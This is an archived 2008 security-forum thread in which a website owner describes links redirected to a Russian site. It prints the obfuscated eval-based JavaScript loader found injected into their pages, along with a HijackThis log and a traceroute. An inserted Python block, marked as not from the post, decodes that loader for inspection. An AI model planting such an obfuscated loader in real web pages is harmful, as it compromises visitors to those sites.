Web Page Links Redirected to Russian Web Site



tenmeg
2008-06-27, 22:21
The following was my first posting, but it never got a response. I posted it on 6/25/08 at 15:12.

Hello - This is a form of malware or trojan that redirects the user from a link on my web pages to a Russian web site. This problem seems to defy the usual counter attacks such as Spybot. It also seems to attack only programs located on my cgi-bin directory and only on the initial boot up of my computer. Here is what I have done so far. I ran Spybot in normal mode and then reran it in safe mode. In normal mode I found and deleted a lot of threats and cookies, including the usual suspects such as ZLOB, etc. But on rebooting my computer, the problem of my cgi-bin links being redirected to a Russian web site was still there. The redirect link looked like this: <http://sum4count/strong/184/?c13b08>. The Russian web page address is <http://ya.ru/>. I did change the file name on one of the links, and that seems to confuse the malware as it tries to redirect to the Russian site. Any suggestions on how to get rid of this problem would be greatly appreciated.

Update:

I first thought I might have a serious trojan or malware, but after running my computer through various programs including SpyBot I did not see anything that might cause this problem. So I went hunting while I was waiting to see if anybody could help me from Spybot. It was my LINKS and DATABASE programs that were under attack. I searched through my HTML pages looking for anything that had been changed that would cause this problem. I'm not that technical, so it took me a while to spot the JavaScript that had been added to the header.html pages of both programs. I turned off the Java function in Explorer. I contacted my ISP and soon found out that they can't control hackers that want to add malicious scripts to vulnerable programs. So it's an open highway to your web site if someone skilled enough wants inside. So I'm back in business for the moment. I changed passwords at my ISP. Hid my password to my database. Uploaded fresh web pages minus the JavaScript, and it works until the next time.

I ran a trace program on the rogue site, and here are the results from the Yahoos at Ya.Ru.

traceroute to ya.ru (213.180.204.8), 30 hops max, 38 byte packets
1 66.179.175.1 (66.179.175.1) 12.802 ms 9.092 ms 7.981 ms
2 66.45.70.145 (66.45.70.145) 1.074 ms 1.899 ms 1.801 ms
3 66.179.80.98 (66.179.80.98) 0.498 ms 1.021 ms 0.498 ms
4 ausir5-ge-0-0-0-0.sgns.net (66.179.168.1) 0.993 ms 1.015 ms 0.993 ms
5 POS3-0.GW1.AUS4.ALTER.NET (63.65.123.73) 0.994 ms 1.112 ms 1.082 ms
6 0.so-2-0-0.XL2.AUS4.ALTER.NET (152.63.99.30) 1.169 ms 1.195 ms 1.273 ms
7 0.ge-4-0-0.XL4.IAD8.ALTER.NET (152.63.40.234) 43.175 ms 47.373 ms 46.270 ms
8 GigE7-0-0.GW8.IAD8.ALTER.NET (152.63.33.17) 50.285 ms 42.976 ms 43.143 ms
9 teliasonera-test-gw.customer.alter.net (63.65.76.190) 50.019 ms 67.426 ms 117.475 ms
10 nyk-bb1-link.telia.net (80.91.248.186) 47.435 ms nyk-bb1-pos7-1-0.telia.net (213.248.80.70) 47.801 ms nyk-bb1-link.telia.net (213.248.83.21) 49.414 ms
11 kbn-bb1-link.telia.net (80.91.254.88) 127.029 ms 126.934 ms 126.890 ms
12 s-bb1-link.telia.net (213.248.65.141) 142.190 ms s-bb1-link.telia.net (80.91.248.46) 142.381 ms 142.465 ms
13 mow-b1-link.telia.net (80.91.251.222) 168.553 ms 168.663 ms 160.751 ms
14 yandex-ic-123531-mow-b1.c.telia.net (213.248.104.142) 167.119 ms 159.623 ms 167.840 ms
15 ya.ru (213.180.204.8) 182.576 ms 174.815 ms 182.533 ms

I know less than zero about JavaScript, but for those who do, here is the script that was added to my web pages.

<script language=JavaScript>function pusban(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,17,51,38,15,8,58,16,28,18,0,0,0,0,0,0,3,36,21,4,54,44,1,39,13,48,7,49,11,12,29,27,43,6,41,37,14,9,33,42,52,5,57,0,0,0,0,31,0,32,47,59,0,60,23,50,46,20,53,61,25,22,10,55,40,62,34,30,26,19,2,56,24,35,45);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){{w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(232^w&255);w>>=8;s-=2}else{s=6}}}eval(r);}}pusban('_QpVMswGQbUGUglGOmk2EspVHqeXMswrNmxyQgRK_Wla8D5I4uNaTWlrYD5gQ3xVHmNoLrNr5bR3LmzgdgUGxnkKJbH3Fqw3QJpVTswK8sej448RUgUaQPZVNt5ydftr8vpKt3pVMsxVdJEIOyNXlPNI@08oLrNr44e2nyeGFg5GdmkDOcHgdDxa4v5GBJzD5bUG19xyBPMyFhU3C3xA9OwVQDpgmukKF6p3Umxym08I')</script>

And for anyone at the Spybot forum who wants to take a look at my Safe Mode HijackThis report to see if there are any other problems, here it is.

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 12:36:28 PM, on 6/27/2008
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16674)
Boot mode: Safe mode

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Trend Micro\HijackThis\GemJack.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = http://ie.redirect.hp.com/svs/rdr?TYPE=3&tp=iesearch&locale=EN_US&c=Q405&bd=pavilion&pf=laptop
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Local Page =
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page =
R1 - HKCU\Software\Microsoft\Internet Connection Wizard,ShellNext = http://ie.redirect.hp.com/svs/rdr?TYPE=3&tp=iehome&locale=EN_US&c=Q405&bd=pavilion&pf=laptop
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll
O2 - BHO: Spybot-S&D IE Protection - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O2 - BHO: Canon Easy Web Print Helper - {68F9551E-0411-48E4-9AAF-4BC42A6A46BE} - C:\Program Files\Canon\Easy-WebPrint\EWPBrowseLoader.dll
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0_03\bin\ssv.dll
O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\googletoolbar3.dll
O2 - BHO: Google Toolbar Notifier BHO - {AF69DE43-7D58-4638-B6FA-CE66B5AD205D} - C:\Program Files\Google\GoogleToolbarNotifier\2.1.615.5858\swg.dll
O3 - Toolbar: Easy-WebPrint - {327C2873-E90D-4c37-AA9D-10AC9BABA46C} - C:\Program Files\Canon\Easy-WebPrint\Toolband.dll
O3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\googletoolbar3.dll
O4 - HKLM\..\Run: [ATIPTA] "C:\Program Files\ATI Technologies\ATI Control Panel\atiptaxx.exe"
O4 - HKLM\..\Run: [SynTPEnh] C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
O4 - HKLM\..\Run: [LSBWatcher] c:\hp\drivers\hplsbwatcher\lsburnwatcher.exe
O4 - HKLM\..\Run: [eabconfg.cpl] C:\Program Files\HPQ\Quick Launch Buttons\EabServr.exe /Start
O4 - HKLM\..\Run: [Cpqset] C:\Program Files\HPQ\Default Settings\cpqset.exe
O4 - HKLM\..\Run: [Logitech Hardware Abstraction Layer] KHALMNPR.EXE
O4 - HKLM\..\Run: [Ulead AutoDetector] C:\Program Files\Ulead Systems\Ulead Photo Explorer 8.0 SE Basic\Monitor.exe
O4 - HKLM\..\Run: [TkBellExe] "C:\Program Files\Common Files\Real\Update_OB\realsched.exe" -osboot
O4 - HKLM\..\Run: [HP Software Update] C:\Program Files\Hp\HP Software Update\HPWuSchd2.exe
O4 - HKLM\..\Run: [SSBkgdUpdate] "C:\Program Files\Common Files\Scansoft Shared\SSBkgdUpdate\SSBkgdupdate.exe" -Embedding -boot
O4 - HKLM\..\Run: [OpwareSE4] "C:\Program Files\ScanSoft\OmniPageSE4.0\OpwareSE4.exe"
O4 - HKLM\..\Run: [PestPatrol Control Center] C:\PROGRA~1\PESTPA~1\PPControl.exe
O4 - HKLM\..\Run: [PPMemCheck] C:\PROGRA~1\PESTPA~1\PPMemCheck.exe
O4 - HKLM\..\Run: [CookiePatrol] C:\PROGRA~1\PESTPA~1\CookiePatrol.exe
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [iTunesHelper] "C:\Program Files\iTunes\iTunesHelper.exe"
O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Program Files\Adobe\Reader 8.0\Reader\Reader_sl.exe"
O4 - HKLM\..\Run: [Spy Protector] C:\Program Files\Security Task Manager\SpyProtector.exe /autostart
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - HKCU\..\Run: [EPSON Stylus CX8400 Series] C:\WINDOWS\System32\spool\DRIVERS\W32X86\3\E_FATICEA.EXE /FU "C:\WINDOWS\TEMP\E_S350.tmp" /EF "HKCU"
O4 - HKCU\..\Run: [cdloader] "C:\Documents and Settings\user\Application Data\mjusbsp\cdloader2.exe" MAGICJACK
O4 - HKCU\..\Run: [MalwareRemovalBot] C:\Program Files\MalwareRemovalBot\MalwareRemovalBot.exe -boot
O4 - HKCU\..\Run: [SpybotSD TeaTimer] C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe
O4 - Startup: HotSync Manager.lnk = C:\Program Files\Palm\HOTSYNC.EXE
O4 - Startup: VZAccess Manager.lnk = C:\Program Files\Verizon Wireless\VZAccess Manager\VZAccess Manager.exe
O4 - Global Startup: Adobe Gamma Loader.exe.lnk = C:\Program Files\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe
O4 - Global Startup: Album Fast Start.lnk = C:\Program Files\Ulead Systems\Ulead PhotoImpact 6\ABMTSR.EXE
O4 - Global Startup: Billminder.lnk = C:\Program Files\QUICKENW\BILLMIND.EXE
O4 - Global Startup: Kodak EasyShare software.lnk = C:\Program Files\Kodak\Kodak EasyShare software\bin\EasyShare.exe
O4 - Global Startup: Logitech SetPoint.lnk = C:\Program Files\Logitech\SetPoint\SetPoint.exe
O4 - Global Startup: Quicken Startup.lnk = C:\Program Files\QUICKENW\QWDLLS.EXE
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_03\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_03\bin\ssv.dll
O9 - Extra button: (no name) - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O9 - Extra 'Tools' menuitem: Spybot - Search & Destroy Configuration - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\WINDOWS\system32\shdocvw.dll
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\WINDOWS\system32\shdocvw.dll
O14 - IERESET.INF: START_PAGE_URL=http://ie.redirect.hp.com/svs/rdr?TYPE=3&tp=iehome&locale=EN_US&c=Q405&bd=pavilion&pf=laptop
O16 - DPF: {2D8ED06D-3C30-438B-96AE-4D110FDC1FB8} (ActiveScan 2.0 Installer Class) - http://acs.pandasoftware.com/activescan/cabs/as2stubie.cab
O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) - http://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab
O23 - Service: Apple Mobile Device - Apple, Inc. - C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
O23 - Service: Ati HotKey Poller - ATI Technologies Inc. - C:\WINDOWS\system32\Ati2evxx.exe
O23 - Service: Google Updater Service (gusvc) - Google - C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
O23 - Service: HP WMI Interface (hpqwmi) - Hewlett-Packard Development Company, L.P. - C:\Program Files\HPQ\SHARED\HPQWMI.exe
O23 - Service: hpqwmiex - Hewlett-Packard Development Company, L.P. - C:\Program Files\Hewlett-Packard\Shared\hpqwmiex.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe
O23 - Service: iPod Service - Apple Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: Kodak Camera Connection Software (KodakCCS) - Eastman Kodak Company - C:\WINDOWS\system32\drivers\KodakCCS.exe
O23 - Service: LightScribeService Direct Disc Labeling Service (LightScribeService) - Hewlett-Packard Company - C:\Program Files\Common Files\LightScribe\LSSrvc.exe
--
End of file - 7486 bytes

Thanks for looking, and I hope it helps others in a similar situation.
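For anyone who wants to read what the injected pusban() script above actually does without letting a browser run it, here is an added Python example (not from the post) that mirrors the script's decoder and returns the decoded text instead of handing it to eval(). The lookup table and the obfuscated string are transcribed from the script on the page; encode_pusban() is an inverse written here only to check that the decoder is faithful.

```python
# Transcribed from the injected script: index = ord(ch) - 48, value = 6-bit symbol.
T = [63, 17, 51, 38, 15, 8, 58, 16, 28, 18, 0, 0, 0, 0, 0, 0, 3, 36, 21, 4, 54, 44,
     1, 39, 13, 48, 7, 49, 11, 12, 29, 27, 43, 6, 41, 37, 14, 9, 33, 42, 52, 5, 57,
     0, 0, 0, 0, 31, 0, 32, 47, 59, 0, 60, 23, 50, 46, 20, 53, 61, 25, 22, 10, 55,
     40, 62, 34, 30, 26, 19, 2, 56, 24, 35, 45]
# The 64 characters the script uses; the zeros at ':'..'?', '['..'^' and '`' are
# unused padding in the table, while 'd' is the real symbol for value 0.
ALPHABET = "0123456789@ABCDEFGHIJKLMNOPQRSTUVWXYZ_abcdefghijklmnopqrstuvwxyz"
SYMBOL_TO_CHAR = {T[ord(c) - 48]: c for c in ALPHABET}   # inverse of T
XOR_KEY = 232                                             # the '232^w&255'

def decode_pusban(payload: str) -> str:
    """Same bit-juggling as pusban(), but returns the text it would eval().
    Symbols are 6 bits each, packed little-endian; every completed byte is XORed."""
    out, w, s = [], 0, 0
    for ch in payload:
        idx = ord(ch) - 48
        if not 0 <= idx < len(T):
            raise ValueError(f"character {ch!r} is outside the decoder table")
        w |= T[idx] << s
        if s:                      # 8 or more bits buffered: emit one byte
            out.append(chr(XOR_KEY ^ (w & 0xFF)))
            w >>= 8
            s -= 2
        else:                      # first symbol of a four-symbol group
            s = 6
    return "".join(out)

def encode_pusban(text: str) -> str:
    """Inverse of decode_pusban(); written here to round-trip-test the decoder."""
    bits, nbits, out = 0, 0, []
    for ch in text:
        bits |= (ord(ch) ^ XOR_KEY) << nbits
        nbits += 8
        while nbits >= 6:
            out.append(SYMBOL_TO_CHAR[bits & 0x3F])
            bits >>= 6
            nbits -= 6
    if nbits:                      # zero-pad the trailing partial symbol
        out.append(SYMBOL_TO_CHAR[bits & 0x3F])
    return "".join(out)

# The obfuscated argument from the post, so the hidden script can be inspected.
PAGE_PAYLOAD = ("_QpVMswGQbUGUglGOmk2EspVHqeXMswrNmxyQgRK_Wla8D5I4uNaTWlrYD5gQ3xVHmNoLrNr"
                "5bR3LmzgdgUGxnkKJbH3Fqw3QJpVTswK8sej448RUgUaQPZVNt5ydftr8vpKt3pVMsxVdJEI"
                "OyNXlPNI@08oLrNr44e2nyeGFg5GdmkDOcHgdDxa4v5GBJzD5bUG19xyBPMyFhU3C3xA9Ow"
                "VQDpgmukKF6p3Umxym08I")

if __name__ == "__main__":
    print(repr(decode_pusban(PAGE_PAYLOAD)))   # repr() keeps odd bytes visible
```

Replacing eval() with a return like this is the usual first step when an unfamiliar script turns up in a page header: the decoded text shows where the redirect points, which is what to search the rest of the site's files for.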

tashi
2008-06-28, 00:27
Hello,

Your previous topic was started on 25th June, 2007.
http://forums.spybot.info/showthread.php?t=30044


Please do not start new ones. The Waiting Room: Post here if waiting for help longer than four days (http://forums.spybot.info/forumdisplay.php?f=37)

Best regards.